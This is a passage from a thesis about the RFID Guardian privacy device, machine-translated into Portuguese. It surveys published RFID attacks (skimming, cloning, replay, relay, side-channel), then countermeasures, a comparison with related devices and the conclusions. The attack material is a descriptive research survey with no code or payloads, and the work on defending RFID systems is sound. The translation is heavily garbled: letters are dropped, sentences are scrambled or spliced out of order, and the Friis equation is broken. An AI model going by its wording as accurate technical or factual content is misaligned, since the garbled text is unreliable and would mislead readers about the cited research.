Um exemplo instrutivo de curto alcance desnatao o "Johnny Carson" noaderncia, em que Tom Heydt-Benjamin e Kevin Fu da Universidade de Massachusetts os dados Amherst ler cleartext pessoais (nome, nmero de carto de crdito) da primeira gerao de cartes de crdito RFID [64]. Eles a chamaram isso de "CarJohnny ataque filho, "depois de Carson" Carnac o sketch "Magnificent, onde telogos respostas sem fisicamente abrir um envelope contendo as perguntas. HeydtBenjamin e Fu hiptese de que, de tal forma, os criminosos poderiam subornar correios empregado para colher informaes de carto de crdito de envelopes selados. Ferramentas como o Sniffer RFID [173] esto comercialmente disponveis de curto alcance "Tcpdump-style" RFID sniffing.

Figura 10.1: RFID Sniffer

Long-Range Skimming HF Uma instncia de longo alcance de alta freqncia (13,56 MHz skimming) foi documentada por Ilan Kirschenbaum e Avishai Wool, que publicou o desenho de uma escumadeira RFID HF em seu artigo Segurana USENIX "Como construir um baixo custo, Extended-Range Skimmer RFID, em 2006. [86] Suas bateria-powered dispositivo custa US $ 100 e espumas de at 35 cm. A antena utilizada por Kirschenbaum e l mostrado na Figura 10.2.

Figura 10.2: Antenas Skimming grandes RFID

Houve vrios exemplos menos rigorosamente documentados de HF (13,56 MHz) RFID desnatao de distncias muito maiores. Um exemplo notvel foi a

SCE . 10,1

ATTACKING RFID

117

Conferncia ACM para a Liberdade e Privacidade (PCP) em 2005, quando Barry SteinHardt da ACLU ler os EUA do Departamento de Estado representante Frank Moss passaporte RFID demonstrao de mais de um metro de distncia [60].

Long-Range Skimming UHF Um exemplo freqentemente citado de longo alcance UltraAlta Freqncia (860 MHz-2.45 GHz) desnatao RFID estava em DefCon 13, quando pesquisadores da empresa de segurana LA computador baseado em um Flexilis eavesdropped "Passivo" UHF tag RFID de 69 metros de distncia [42]. Embora este trabalho j foi reproduzida por vrios outros, a notcia original artigo, infelizmente, gerou uma certa quantidade de confuso entre os no-cientistas, fazendo com que muitos a pensar que as marcas de HF so sniffable de distncias semelhantes. Long-Range Skimming atividade Etiquetas RFID ativas so essencialmente alimentados por bateria sensores, para que esses tipos de etiquetas poderia ser lida a partir de uma distncia ilimitada de distncia (ou seja por um satlite). Um exemplo particularmente divertido de Saponas et. al. da Universidade de Washington, que demonstraram um sistema de rastreamento para a Nike + transponders [137]. Seu sistema de minsculas (mostrado na Figura 10.3) foi capaz de detectar a Nike + transponder at 60 metros de distncia. Em seguida, ele enviou as informaes de localizao para o Google Maps e SMS / e-mail os detalhes para que um invasor remoto.

Figura 10.3: Nike + Sniffer

Tericas Ranges Skimming possvel para os atacantes para espionar RFID respostas tag de distncias muito maiores que as demonstradas anecdotally no final, a fsica impe os limites absolutos para distncias de leitura RFID tag. Para responder corretamente a pergunta "o quo longe voc pode ler etiquetas RFID?", devese considerar vrios fatores, incluindo: a freqncia do RFID utilizada, o tipo de tag leitor de acoplamento utilizado (indutivo vs backscatter), o piso de rudo ambiente, a sensibilidade do receptor, o tamanho da antena, eo projeto do tag RFID (Isto design de antena).

118

RExultante W ORK

CHAP. 10

Para indutivamente acoplado RFID (ou seja, LF / HF), a regra geral do polegar usar Equao de Friis Transmisso:
Pr Pt =

( 4R )2. Gt. Gr

Para etiquetas RFID que utilizam backscatter baseado acoplamento (isto , UHF, ativo), o sinal-rudo muito mais crtico, portanto, a sensibilidade do receptor e piso de rudo ambiente ir revelar-se os fatores limitantes.

10.1.2. RFID Manipulao de Dados


Ambos os HW e SW projetos baseados em fornecer facilidades para a manipulao de tags RFID em vrios nveis da pilha de protocolo RFID. Hardware ferramentas baseadas O OpenPCD totalmente open-source 13.56 MHz RFID reader [175]. Ele suporta o ISO / IEC 15693 / 14443 normas e o padro MIFARE, mais ele d aos usurios controle personalizado sobre RF de transmisso / recepo em cada camada do protocolo de RFID pilha. Esta granularidade de controle permite que atacantes para realizar sutis e complexas operaes em 13,56 MHz transponders RFID.

Figura 10.4: OpenPCD

Um exemplo desse tipo de ataque foi realizado por Karsten Nohl da Universidade da Virgnia, quando ele utilizou o OpenPCD para atacar o Pseudo-Random Gerador de nmero (PRNG) do algoritmo de criptografia MIFARE 1 encontrados em Philips MIFARE 1k/4k cartes inteligentes sem contato [117]. A MIFARE PRNG derives seu valor de semente a partir do momento entre os power-up do carto e recepo de a consulta exigindo a gerao de nmero pseudo-aleatrio. Ento, porque o OpenPCD controla tanto o campo de RF gerado eo sinal de clock RFID leitor, Nohl foi capaz de fazer o carto MIFARE gerar repetidamente o mesmo "random" nmero.

SCE . 10,1

ATTACKING RFID

119

GNU Radio combinado com a Universal Software Radio Peripheral (USRP) oferece instalaes semelhantes, mas mais genrico para controle granular sobre RF transmisComisso e recepo, permitindo que os atacantes para criar interaes personalizadas com RFID sistemas, sem necessidade de qualquer conhecimento de hardware. No entanto, a desvantagem do de usar GNU Radio para atacar sistemas RFID que ele no otimizado para qualquer comum frequncias RFID (ie 125/135 kHz, 13.56 MHz, 860/960 MHz, 2,45 GHz), resultando em uma ampla suboptimal operacional. Alm disso, GNU Radio faz no oferecer suporte nativo para qualquer comum RFID protocolos (ie ISO, EPC Classe-1 Gen-2).

Software Baseado em Ferramentas Existem vrias bibliotecas open-source SW para leitura / manipulao de dados sobre RFID tags. RFIDIOt uma biblioteca open-source Python escrito por Adam Laurie (aka Major Malfunction) que fornece uma interface unificada para a conduo de uma variedade de 13,56 125/135 MHz e leitores RFID KHz [92]. RFIDIOt facilita a criao de scripts de maliciosos consultas RFID, por exemplo, Pieter Siekermann e Maurits van der Schee da Universidade de Amsterd usou a API RFIDIOt com sucesso ataque dos holandeses RFID transporte pblico do sistema (OV Chipkaart), manipulando os dados de uso nico cartes MIFARE Ultralight para explorar um buraco no back-end RFID middleware, que permite viagens gratuitas. [144] RFDump uma ferramenta open-source semelhante escrito por Lukas Grunwald para driving 13,56 MHz e 125/135 leitores RFID KHz [56]. RFDump fornece uma unificada API para leitura / escrita de memria tag RFID, alm de implementos de fora bruta chave craqueamento (para cartes MIFARE). Na DefCon em 2007, Grunwald tambm deu uma interdemonstrao de como esting RFDump poderia modificar a imagem JPEG2000 em um um passaporte eletrnico para conter um estouro de buffer, que foi capaz de travar com sucesso um LibRFID uma implementao open-source de vrios RFID comum proGerman ePassport leitor. tocol pilhas, escrito por Harald Welte, que serve como um companheiro SW baseada em o projeto OpenPCD HW. [172] LibRFID implementa leitor lado pilhas para o Normas ISO 14443/15693/MIFARE, e apoia a OpenPCD e Omnikey CardMan 5121/5321 leitores RFID. Com o mesmo esprito, OpenMRTD, tambm de Harald Welte, um open-source SW implementao da pilha de protocolos necessrios para a leitura ICAO-compliant Documentos Machine Readable Travel (MRTDs, ePassports aka). [171]

120

RExultante W ORK

CHAP. 10

Figura 10.5: RFDump: Screenshot

10.1.3. Spoofing / tag repetio Ataques


Um grande nmero de emuladores tag RFID esto disponveis na Segurana RFID / Privacidade domnio, os quais so capazes de realizar "spoofing tag" e ataques replay. Um contemporneo do Guardio RFID, o ProxMark de Boston com base em Jonathan Westhues foi um dos primeiros emuladores de tag RFID j construdo. [177] Em primeiro lugar descrito em RFID Simson Garfinkel antologia ': Aplicaes, Segurana e PriVacy ', o ProxMark uma kHz e 13,56 MHz 125/135 emulador tag RFID que est atualmente em sua terceira verso de seu cdigo-fonte aberto HW.

Figura 10.6: ProxMark III

O III ProxMark lendrio porque foi o primeiro emulador de tag RFID que foi capaz de clone passa acesso ao edifcio, e para o deleite da massa media, chips implantveis Verichip humano-RFID. Demonstrou pela primeira vez no HOPE conferncia de hackers em Nova York, Westhues usou seu ProxMark III para clonar o

SCE . 10,1

ATTACKING RFID

121

Verichip do Silicon Valley com base em tecnologia jornalista Annalee Newitz. (Annalee carinhosamente se refere a ela Verichip como "falha de segurana em seu corpo".) A-cien papel cientfica co-autoria de Westhues descreve os detalhes e implicaes da Verichip ataque clonagem [57], alm de esquemas e firmware para um despojado-down verso do III ProxMark, chamado Verichip Cloner [178] tambm esto disponveis no Westhues website ".

Figura 10.7: Verichip Cloner

O OpenPICC um open-source 13.56 MHz RFID emulador que compavel com o RFID ISO-14443/15693 normas [174]. Desenhado por Harald Welte, Milosch Meriac, e Brita Meriac, o OpenPICC compatvel com o OpenPCD e libRFID, permitindo assim que os invasores para executar ataques de repetio e de retransmisso usando uma configurao combinada. O OpenPICC tambm importante porque foi o primeiro open-source emulador tag RFID disponveis para compra no mercado comercial.

Figura 10.8: OpenPICC

A Tag RFID Demonstrao por Manfred Aigner da TU Graz uma tag RFID cloner que suporta 13,56 MHz ISO 15693/14443/18000 RFID padres [4]. O RFID Tag Demo principalmente interessante porque tambm est disponvel comercialmente

122

RExultante W ORK

CHAP. 10

(560 Euros por unidade). O Tag Watchdog um reforo da privacidade de 13,56 MHz compatvel I.CODE1 RFID tag emulador que foi originalmente concebido em 2004 o papel terico "Digitalizao com um Propsito - Apoiar os Princpios Informao Fair em RFID Protocolos "por Floerkemeier, Schneider, e Langheinrich na ETH Zurich [43]. Este trabalho sugere que os leitores RFID deve enviar P3P estilo de meta-informao indicando o mbito e objectivo da recolha de dados, que depois decodificado e exibido pela Tag Watchdog. Esta idia foi mais tarde prottipo em 2007 no MIT Auto-ID Labs por Metzger et. al. [107] O emulador de carto de crdito PICCAL [63] foi descrito no documento "vulnerabidades em Primeira Gerao Cartes RFID de crdito "por Heydt-Benjamin et. al. na Universidade de Massachusetts em Amherst. Os pesquisadores usaram uma configurao ad-hoc com um Gumstix computador de placa nica, 13,56 MHz sintonizado antena e osciloscpioescopo e SW suporte para ISO-14443 para executar ambos os ataques passivos e ativos contra RFID cartes de crdito.

Figura 10.9: Carto de Crdito Emulator PICCAL

Vrios outros prottipos RFID tag emulador tm sido descritos na RFID segurana literatura de pesquisa. Dario Carluccio, Timo Kasper, e Christof Paar dedescrito os detalhes da implementao de um "Multi finalidade ISO 14443 Ferramenta de RFID" em seu papel RFIDSec em julho de 2006. [24] Bsico RFID prottipos emulador tag tem tambm foram descritos em Segurana os jornais "Implementao em sistemas RFID: The "Emulator Tag" [35] e 'Design de emuladores UHF RFID com aplicaes para RFID testes e transporte de dados [8]. As empresas esto apenas comeando a "entrar em ao" com cdigo fechado comcomercial RFID emuladores tag. Um exemplo recente o CISC Semiconductor RFID Tag Emulator [142], que comercializado para os testes, anlises e verificaes o das implementaes de RFID. Mdulos de sensores permitem o controle sobre vrias emulao tagparmetros de configurao, eo sistema compatvel com EPC Classe-1 Gen-2 Tags RFID. No entanto, este sistema est longe de romance - considerando o grande nmero de prottipos de pesquisa eo mercado de alto valor para RFID diagnstico e segutestes de segurana, os emuladores de tag RFID mais comercial so susceptveis de aparecer no prximo

SCE . 10,1

ATTACKING RFID

123

futuras.

10.1.4. Rel Ataques RFID


Ataques contra os sistemas de RFID rel so prfidos, porque eles so bastante fceis de conduta, folha on-tag criptografia (de qualquer fora), e eles so difceis de detectar ou interromper. "Picking Pockets Virtual usando ataques de retransmisso no Smartcard Contactless" por Ziv Kfir e Avishai Wool foi o primeiro trabalho publicado para descrever um sucesso RFID ataque de retransmisso [84]. Kfir e construiu dois L 13,56 MHz ISO-14443 compadispositivos ble, que servem como repetidores para consultas afinao tag RFID / respostas. O "Fantasma", que pode ser de at 50m de distncia do leitor de RFID, conectado via um rpido canal digital de comunicao para o "sanguessuga", que pode ser de at 50 cm para fora da placa RFID.

Figura 10.10: Fantasma e Sanguessuga

Na mesma poca, Gerhard Hancke da Universidade de Cambridge escreveu "A ataque de retransmisso prticas sobre ISO 14443 Cartes de Proximidade ', que descreveu sua prpria 13,56 MHz ISO-14443 dispositivo compatvel relay RFID. [59] O papel descreve dois dispositivos RFID relay tag chamado de "mole" e "proxy", que so muito de natureza semelhante ao "fantasma e sanguessuga" Kfir e Wool. De acordo com o jornal, o "mole" pode ser de at 50m de distncia do leitor de RFID, e os "proxy" podem ser at 10 cm de distncia do carto de RFID. Ataques baseados em RFID rel tem aplicaes prticas reais, inclusive com paymento e sistemas de controle de acesso. Alm disso, na nota seu trabalho 'A sobre o rel Attachas de e-passaportes - The Case of Czech e-passaportes, Hlavac e Rosa descrito a possibilidade de um ataque de retransmisso no ePassport Checa [65]. Eles descrevem como um atacante pode ajustar os parmetros ea intensidade do campo, causando at um segundo quatro demora entre o pedido ea resposta MRTD leitor, durante o qual um atacante pode realizar um ataque de retransmisso de sucesso.

124

RExultante W ORK

CHAP. 10

Figura 10.11: Dispositivos de rel de Gerhard Hancke

10.1.5. Ataques de canal lateral


Canal lateral so ataques que so baseados em informaes obtidas a partir da implementao fsica de um sistema criptogrfico. Canal lateral-ataques podem utilizar informaes de tempo, consumo de energia, radiao eletromagntica, ou mesmo som para estatisticamente recuperar chaves criptogrficas. Canal lateral-ataques foram aplicadas a RFID, o exemplo mais notvel Yossef Oren e Extrao de papel Adi Shamir 'Password remoto a partir de RFID Tags '[121]. Em seu estudo, Oren e Shamir utilizaram a anlise de energia para extrair matar senhas de ambos os EPC Gen-1 e EPC Gen-2 tags. Oren e Shamir descobriu que EPC Classe-1 Gen-1 as tags sem querer modulam o retroespalhamento em proporo ao consumo de energia de seus internos computations. Os passos seguintes descrevem o seu ataque: envia um comando kill (com uma senha incorreta), e demodular a resposta tag RFID. Ento capturar o baseband sinal com um osciloscpio digital, e transferir os vestgios recolhidos para o PC. Em seguida, normalizar e alinhar os traos com Matlab, e analisar os traos visualmente e automaticamente. Uso de uma antena direcional tambm minimiza o efeito das emisses do leitor RFID do poder. H uma srie de outros exemplos importantes de canal lateral / DPA ataques no domnio RFID. [25] [69]

10.2. PROTEGENDO RFID


Segurana e privacidade pesquisadores propuseram uma ampla gama de contramedidasSures contra ameaas de segurana RFID incluindo: desativao da etiqueta, crip-leve primitivas tographic, protocolos de autenticao, distncia protocolos delimitadora, oncontrole de acesso tag, e controle de acesso off-tag. Esta seo ir discutir cada um dos essas classes de contramedidas. Os interessados que queiram obter informaes adicionais tambm so incentivados a ler Retrospectiva Ari Juels "de 20 pginas da literatura de pesquisa RFID segurana / privacidade [74].

SCE . 10,2

PROTEGENDO RFID

125

10.2.1. Desativao RFID Tag


Uma das maneiras mais bvias para mitigar RFID de segurana e ameaas de privacidade desativar (ou eliminar) as tags RFID. Um mtodo de desativao permanente tag RFID "matar tag" [36]. EPC Classe-1 Gen-2 tags RFID tem um comando "kill", que requer um segredo de 32 bits matar cdigo. Recepo do cdigo de matar permanentemente desativa o tag RFID. InfelizInfelizmente, porm, porque a desativao SW-base, os pesquisadores descobriram que as etiquetas RFID podem ser ressuscitada mais tarde [18]. Outro mtodo de desativao permanente tag RFID "tag zapping". AtTackers pode desativar permanentemente uma tag RFID utilizando pulsos eletromagnticos (EMPs). Isto pode ser conseguido colocando uma tag RFID no microondas - no entanto, as pessoas tm tambm construiu tag mais porttil zapping dispositivos. Christopher Hirschmann Tilman e Runge do Chaos Computer Club construiu um zapper tag RFID utilizando uma cmera descartvel [109]. Eles acoplado o capacitor do flash da cmera com uma antena sintonizada para 13,56 MHz, o Zapper destri RFID tags RFID quando utilizao de pelo menos 100V. Um dispositivo semelhante, a Washer RFID, anunciado em [12].

Figura 10.12: RFID Zapper

Outro mtodo de desativao tag RFID atravs de destruio fsica "tag clipping "[80]. Este mtodo, desenvolvido pela Karjoth e Moskovitz da IBM Repesquisa, as etiquetas RFID d uma antena perfuradas, que podem ser arrancadas (como um postal carimbo) aps a compra de um item de varejo. As etiquetas RFID podem tambm ser temporariamente desativada. A gaiola de Faraday um gabinete formado por algum tipo de material condutor, que bloqueia eltrica externa campos. O muito brincou sobre tinfoil-hat um kindof gaiola de Faraday. Gaiolas de Faraday so uma tecnologia reforo da privacidade popular para RFID, uma vez que eles so to fceis de construir e usar. Por exemplo, algumas empresas esto vendendo carteiras de papel alumnio (mostrado na Figura 10.14) para proteger os cartes de crdito RFID, passes de acesso, e at mesmo passaportes.

126

RExultante W ORK

CHAP. 10

Figura 10.13: Clipped RFID Tag

Figura 10.14: RFID Wallet Anti-Skimming

Claro, nem sempre possvel para embrulhar itens RFID marcado em papel alumnio, mtodos para desativao temporria de outras tag RFID so necessrias. Senha protegidos de sono / viglia modos [149] foram propostas e at mesmo implementado em algumas tags RFID.

10.2.2. Leve Primitives Cryptographic


Criptgrafos criaram novos algoritmos de baixa potncia para tags RFID. Alguns desses algoritmos incluem fluxo cifras [41]. Outro exemplo em on-tag RFID fluxo cifras so EPC Gen-2 "cobertura de codificao." EPC Classe-1 Gen2 tags RFID uso one-time pad-link baseada cobrir-coding para obscurecer a palavra sering transmitidas. As questes Interrogator um pedido, ao qual a tag responde retroespalhamento um nmero de 16 bits aleatrios. O interrogador ento gera uma 16 cifrado bit por XORing a palavra 16-bit a ser transmitido com o nonce, tanto MSB primeiro, e emite o comando com essa seqncia de texto cifrado como parmetro. O Tag ento descriptografa a seqncia recebida texto cifrado por XORing recebido 16-bit cifrado com o nmero original aleatria. Os pesquisadores tambm criaram cifras de bloco leve para etiquetas RFID. MarFeldhofer estanho foi o primeiro a implementar uma cifra de bloco leve (AES) para RFID [40]. Ele, ento, construiu uma infra-estrutura de autenticao para a sua verso da leve AES [38] [39]. Desde ento, outros pesquisadores tambm trabalharam nas novas

SCE . 10,2

PROTEGENDO RFID

127

cifras de bloco leve [32] [5] [97] [127]. Pesquisadores tm mais recentemente vem trabalhando na realizao de chave pblica de criptografia primitivas em tags RFID. Muito poucos pesquisadores tm investigado a viabilibilidade de chave pblica de criptografia para etiquetas RFID [16] [89] [104] [136], alm de ter desendesenvolvidos curva elptica crypto para RFID [15] [179], junto com uma verso leve de NTRU [55].

10.2.3. Protocolos de autenticao


Vrios pesquisadores criaram protocolos leves para autenticao. Alguns mtodos so puramente de criptografia [158] [163], alguns exigem teclas extras adquiridos visualmente [76], e outros requerem teclas extras adquiridos fisicamente [19]. Para uma reviso de tcnicas de autenticao RFID produto, consulte este artigo [93]. A Srie HB uma srie especial de protocolos leves que foram criados por Stephen Weis e Juels Ari, depois eles observaram as semelhanas entre RFID e autenticao humana [168]. Isso os levou a criar o HB + protocolo [79]. Desde ento, vrios pesquisadores tm estendido [125] [23] e criptoanalisadas [49] [81] ele. Os pesquisadores tambm criaram protocolos especficos da aplicao de autenticao para: Bibliotecas [112], transporte pblico [62], passaportes [94], anti-falsificao [150] [160], e vesturio [180]. Alm disso, os protocolos de autenticao so necessrios para a transferncia segura de propriedade de etiquetas RFID [110] [45] [98]. Os pesquisadores tambm ativamente criptoanalistas de esquemas de autenticao lisados RFID publicados na literatura cientfica [6] [13] [28] [90].

10.2.4. Distncia Bounding Protocolos


Os mais promissores contramedida contra ataques de rel RFID que foi sugesugerido at agora na literatura de pesquisa o protocolo de distncia delimitadora. Protocolos distncia delimitadora foi primeiramente descrito em 1993 por Marcas e Chaum [22]. Nestes protocolos, um verificador gera um bitstream aleatria, e um provador responde com as respostas de um nico bit de criptografia. O verificador vezes o atraso de ida e volta do single-bit desafio-resposta, e prover transmite um MAC para os dois bitstreams. O provador, em seguida, deve confirmar ao verificador que recebeu cada um desalenge pouco antes de enviado o bit correspondente resposta. Proxy verificadores responderia prematuramente, tornando-os detectveis com a 2 -N probabilidade. Distncia protocolos delimitadora foram primeiramente aplicados para RFID por Gerhard Hancke [58]. Protocolos distncia RFID medir o atraso de ida e volta do desafio RFID / resposta sinal, inferindo um limite superior para a distncia entre o leitor RFID e tag, baseado na velocidade da luz (0,3 m / ns). A distncia RFID delimitadora protocolo occurs em duas fases. Fase 1 no momento crtico: single-bit respostas so precalcu-

128

RExultante W ORK

CHAP. 10

regulado por corrente, ciso, e carregados nos registradores de n bits turno. Fase 2 momento crtico: usar uma exata atrasos na transmisso de um nico bit desafios so transmitidos, que selecionam um dos dois registos de deslocamento. Desta forma, apenas a metade dos bits resposta gerada so revelados. O leitor de RFID deve ajustar o prazo de transmisso at que receba a resposta correta, que lhe permite deduzir a distncia do sinal RFID. Hancke utiliza comunicao Ultra-Wideband (em vez de 13,56 MHz) para implementar RFID delimitadora distncia, uma vez que a resoluo da estimativa distncia depende largura de banda suficientemente rpido. Desde a publicao de papel Hancke, outros melhoraram em cima de seu RFID trabalho a distncia delimitadora [114] [131] [159].

10.2.5. Em Tag-Controle de Acesso


Pesquisadores tm sugerido vrios mecanismos para a tag de controle de acesso. Um das primeiras propostas foi um hash protocolo baseado em controle de acesso chamado de "hash lock "[169]. Neste esquema, um leitor de RFID define bloqueio hash = (key) onde o chave um nonce. A tag armazena esse valor lock (Meta-ID) em uma memria reservada localizao, e entra no estado bloqueado. Para desbloquear o tag, o leitor precisa enviar o valor da chave para a marca, de modo a tag pode executar uma funo hash em que, por isso se ele corresponde ao valor armazenado Meta-ID, a tag pode desbloquear em si. Randomizado de hash bloqueios tambm proporcionar privacidade localizao por ter etiquetas RFID uso PRNGs para responder a consultas leitor com um par de valores (r, hash (IDK - r)), onde r o random nmero gerado por uma tag, IDK o ID da tag kth, fazendo com que a tag RFID apenas divulgar r eo valor hash. Pseudnimos tambm tm sido sugeridos em criptografia minimalista [72], e Philippe Golle aplicada pela primeira vez o conceito de re-encriptao de RFID [51]. Desde ento, outros pesquisadores tmde Acesso o esquema de criptografia de Re-Universal [135] 10.2.6. Off-Tag Controle reforado [122]. Vrios mecanismos para reforar o controle de acesso tag RFID fora do tag RFID em si tm sido sugeridos na literatura de pesquisa. Uma das primeiras sugestes foi o Tag Blocker RSA [77] por Ari Juels; esta uma tag RFID que os abusos de um leitor algoritmo anticoliso para impedir a leitura "zonas" de IDs tag. Ele, ento, estendida sua idia de "tags bloqueador soft" [75], em que uma poltica de privacidade de dados est contido na poro de dados de uma tag RFID, o leitor de RFID e, em seguida, regula-se a seguir esta poltica. A tag RFID Watchdog [43] opera em linhas muito semelhantes, contendo poldados de gelo, que um leitor de RFID usa para se auto-regular. O RFID Enhancer Proxy [78] um off-tag esquema de controle de acesso muito simlhantes na natureza com o Guardian RFID. Tassos Dimitriou do "Quadro de Proxy para

SCE . 10,3

COMPARAO TO RFID G UARDIAN

129

Figura 10.15: RSA Tag Blocker

Aprimorada RFID Segurana e Privacidade "[31] sugere protocolos de segurana detalhadas que poderia ser usado em conjunto com off-tag ferramentas de controle de acesso, como o RFID Tutor ou REP. Pressupostos para este esquema que as etiquetas RFID compartilhar uma seTag Cret com um DB back-end, e que RFID tm funes hash, PRNGs, e um sleep / wake funo. Quadro de proxy Dimitriou oferece protocolos de segurana para: a propriedade tag tag, nova criptografia, colocando etiquetas para dormir, acordar as tags acima, mascarando respostas tag proxy, mediao de tags, tag e solte. Papis oferecendo sistemas semelhantes, a off-tag de controle de acesso RFID incluem MoAgente de bile para RFID Privacy (MARP) [85], e Soppera de RFID Tag Acceptor 10.3. COMPARAO AO RFID GUARDIAN (RAT) [148].

Nome ferramenta NFC Dados privatizador Tag bloqueador Campo Probe ProxCard Cloner RFID Enhancer Proxy RFID Guardio

Emulao Tag (SW)

Emulao Tag (HW)

Digitalizao de auditoria de acesso Controle Autenticao

Implementao

Tabela 10.1: RFID Tag emuladores para Segurana / Privacidade

O mais prximo trabalho para a nossa a RFID Enhancer Proxy [78], que compartilha sevsemelhanas gerais com o Guardio RFID. A REP tambm um dispositivo ativo mvel que executa tag RFID de gerenciamento de segurana, utilizando uma comunicao de duas vias canal. No entanto, a REP tem algumas diferenas chave do Guardian RFID. Em primeiro lugar, a REP explicitamente "adquire" e "releases" RFID tag atividade, que o Guardio no faz. Em segundo lugar, a REP de duas vias canal de comunicao "out-of-band" (ou seja Bluetooth ou WiFi), que requer infra-estruturas adicionais ser-

130

RExultante W ORK

CHAP. 10

indo muito alm do canal de RFID. Em terceiro lugar, o "tag relabeling" mecanismo requer RFID etiquetas para gerar nmeros aleatrios (ou ter um modo de hibernao), que muitas marcas no podem fazer. Finalmente, (e talvez mais importante), a REP puramente terico, ao contrrio The Guardian RFID, os conceitos introduzidos pelo jornal REP nunca foram implementadas, nem verificados experimentalmente. RFID auditoria tag (e clonagem) so suportadas por vrios dispositivos. FoeBuD de Dados privatizador [44] ir detectar scans RFID, encontrar e ler etiquetas RFID e copie leitura de dados para novas tags. A Mark II ProxCard Cloner, por Jonathan Westhues [176] mais de uso geral cloner de carto de proximidade, que suporta a emulao de vrias freqncias e padres RFID (o HW elegante, mas o SW pending). Nenhuma dessas executar todas as auditorias do, gerenciamento de chaves, controle de acesso, e funes de autenticao que o Guardian RFID faz. Uma abordagem menos sofisticada para a proteo da privacidade bloquear scans indepenmente de seu leitor de origem. O Tag Blocker (Juels) [77] originou o conconceito de "RFID bloqueio" como uma forma de tag-off controle de acesso. Ele projetado para abusar o protocolo de rvore de p-anticoliso, e leitores RFID so forados a atravessar o namespace id inteiro quando tentar localizar as etiquetas RFID. Esta abordagem no anaLyze scans de entrada, procurar informaes em uma lista de controle de acesso, e dependendo do que encontrar, tomar medidas como o Guardian RFID faz. Alm disso, no foi implementadas. (A SW puramente baseada em tag bloqueador "soft" foi implementado, mas que espera que os leitores RFID para auto-regular o seu comportamento.) Um dispositivo ativo, que pode detectar scans RFID o MIT RFID Campo Probe [99]. um dispositivo porttil, criado por Redemske Rico no MIT Auto-ID Center, que integra um emulador tag RFID e sonda sensor. O HW consiste de um semitag passiva, um detector de nvel de potncia, e uma bateria auxiliar. A sonda de campo RFID d representaes de udio e visual da intensidade do sinal de campo e sinal de qualidade. No entanto, sua funo no para proteger a privacidade de seu dono, mas como uma ferramenta para ajudar os fornecedores de determinar onde em seus pallets para anexar a tag RFID para maximizar intensidade do sinal para aplicaes de gerenciamento de cadeia de fornecimento. Conseqentemente, ele faz No tem nada como o nosso software, que o corao do Guardio da RFID de defesa da privacidade. Vrias outras tecnologias baseadas em RFID apoiar o conceito de duas vias RFID comunicaes. Perto Field Communications [33] um peer-to-peer RFID relacionados tecnologia de comunicaes. Dispositivos NFC pode consultar as etiquetas RFID e tambm pode comunicar com outros dispositivos habilitados para NFC. No entanto, os dispositivos NFC no pode falar com os no-leitores NFC habilitado RFID e no fazer a proteo da privacidade. Finalmente, as contramedidas RFID descrito na Seo 1.1 so todos os complicomplementar ao Guardio RFID, no sentido de que o Guardian RFID poderia alavancar -los como parte do seu quadro, para ajudar a fornecer controle de acesso personalizado. No entanto, nenhum deles so dispositivos discretos que proteger a privacidade.

CCAPTULO 11

Resumo e Concluses
11.1. RESUMO desta tese
Se estamos sempre imersos em um mar de chips RFID, o Guardio RFID pode fornecer um bote salva-vidas. Este dispositivo movido a bateria, o que poderia ser facilmente integrado em um telefone celular ou PDA, pode monitorar scans e tags em sua vizinhana, alertando o proprietrio de snooping ativa e passiva. Ele tambm pode fazer o gerenciamento de chaves, ala controle de acesso e autenticao nas proximidades leitores RFID automaticamente, tendo a sua contexto e localizao em conta, por exemplo, agir de forma diferente em casa e na rua. Alm disso, pode gerenciar o acesso a contedo confidencial com as tags usando Jamming seletiva. Nenhum outro dispositivo na existncia ou proposta tem todas essas capacidades. The Guardian RFID, portanto, representa um passo importante que permitir No entanto, o que temos aqui descrito apenas que a tecnologia RFID est as pessoas a recuperar alguns de seus privacidade um passo. Pretendemos ainda desenvolver e melhorar o Guardian RFID, dando o prottipo mais capaciameaando laos. Esses recursos incluem suporte para mais frequncias e padres, imtirar. provando o alcance da comunicao, e simplificar o design de HW. Pretendemos tambm para desenvolver os protocolos de segurana que so necessrios para a autenticao e chave de gesto de instalaes, pensando particularmente sobre os requisitos de interao com a infra-estrutura RFID circundante. Em um nvel mais abstrato, o Guardio RFID aborda algumas das dificullaos de administrao de segurana em um mundo de pervasive, descentralizada, de baixo custo, e de baixa potncia computadores. Portanto, esta dissertao no s oferece uma soluo para um problema moderno-dia prtico, mas tambm fornece uma noo de como a administer e proteger computadores continuamente encolhendo no mundo futuro de pervasive computao.

132

SRESUMO

CONCLUSES

CHAP. 11

11.2. TRABALHO FUTURO


Nosso plano para o futuro de produzir em massa e distribua o Guardian RFID para ajudar a melhorar a segurana dos sistemas RFID. Ns j temos alguma experincia trabalhar com uma empresa chinesa que pode fazer de fabricao para ns. Enquanto os nossos inicial ciclos de produo foram para um nmero limitado de unidades (principalmente para depurao fins), esperamos poder aumentar a produo de centenas de unidades na prpria num futuro prximo. Ns tambm estamos olhando para as questes organizacionais e econmicos. No futuro, precisamos investigar o uso de Guardies mltiplas RFID tojuntos. Eles podem colaborar uns com os outros, mas precisamos determinar um nmero das coisas. Por exemplo: como que eles se comunicam? Protocolos de RFID so melhores (Desde Guardies esto garantidos para falar protocolos RFID), mas Bluetooth pode ser mais conveniente (se estiver disponvel) para aplicaes onde uma transmisso mais intervalo importante Outro ponto da pesquisa considerar como Guardies mltiplas RFID poderia ser usado para atacar uns aos outros.

11.3. LIES
The Guardian RFID tambm fornece aos profissionais de segurana do computador com o ferramentas que eles precisam para aplicar seus conhecimentos no domnio RFID. Isso permite que RFID Deployers para contratar algum para "verificar a segurana de suas implementaes por arrombando-lo ". Ferramentas convenientes para RFID testes de penetrao pode muito bem lanar uma indstria de nicho. No entanto, essas ferramentas tambm permitem-script kiddies para ameaar mal concebidos RFID middleware. Mas este jogo de gato e rato, em ltima instncia ajudar a todos. Isto levanta a barra para RFID implantadores, e obriga-os a construir segurana Informaes Por favor, visite nosso site: "www.rfidguardian.org 'All todos Para Mais em seus sistemas. Este desenvolvimento acabar por beneficiar a implantadores e consumidores. est disponvel como open-source, e estamos do HW / SW descrita neste artigo procura de desenvolvedores e beta-testers (tanto para hardware e software), ou qualqueruma pessoa disposta a nos ajudar a desenvolver, distribuir e popularizar o RFID Guardian.

BIBLIOGRAPHY
